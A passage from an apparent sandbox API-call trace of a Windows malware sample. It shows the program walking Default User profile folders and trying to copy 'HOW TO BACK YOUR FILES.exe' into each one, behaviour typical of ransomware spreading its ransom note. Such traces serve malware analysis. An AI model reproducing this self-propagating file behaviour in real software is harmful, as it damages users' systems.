lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.586] CloseHandle (hObject=0x118) returned 1 [0042.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.586] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.586] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.586] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.587] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.587] GetLastError () returned 0x0 [0042.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.587] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.587] CloseHandle (hObject=0x118) returned 1 [0042.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.587] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.588] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.588] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.588] GetLastError () returned 0x0 [0042.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.588] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.588] CloseHandle (hObject=0x118) returned 1 [0042.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.589] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.589] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.589] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.589] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.589] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.589] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.589] GetLastError () returned 0x0 [0042.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.590] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.590] CloseHandle (hObject=0x118) returned 1 [0042.590] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.590] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.590] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0042.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0042.590] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.590] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.591] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.591] GetLastError () returned 0x0 [0042.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.591] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.591] CloseHandle (hObject=0x118) returned 1 [0042.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.591] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.591] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.591] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.591] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.592] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.592] GetLastError () returned 0x0 [0042.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.592] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.592] CloseHandle (hObject=0x118) returned 1 [0042.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.592] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.593] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.593] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.593] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.593] GetLastError () returned 0x0 [0042.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.593] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.593] CloseHandle (hObject=0x118) returned 1 [0042.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.594] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.594] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0042.594] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0042.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.594] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.594] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.594] GetLastError () returned 0x0 [0042.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.595] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.595] CloseHandle (hObject=0x118) returned 1 [0042.595] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.595] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.595] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.595] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.596] GetLastError () returned 0x0 [0042.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.596] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.596] CloseHandle (hObject=0x118) returned 1 [0042.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.596] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.596] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.596] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.596] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.597] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.597] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.597] GetLastError () returned 0x0 [0042.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.597] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, 